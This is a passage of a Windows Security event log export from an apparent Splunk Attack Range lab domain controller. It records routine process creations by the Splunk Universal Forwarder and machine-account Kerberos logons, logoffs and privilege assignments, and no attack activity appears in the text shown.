Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264474
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264476
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1734
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264477
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1554
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264478
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1384
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264480
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264479
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1690
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264481
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x815437
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264484
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x818BC0
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264483
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x818BC0
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62686
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264482
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x818BC0
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:15:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264486
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264485
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ba0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264488
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264487
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ab0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264489
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x143c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264491
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bcc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264490
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264494
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81C509
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264493
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81C509
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62699
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264492
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81C509
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:16:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264496
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1780
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264495
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264497
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
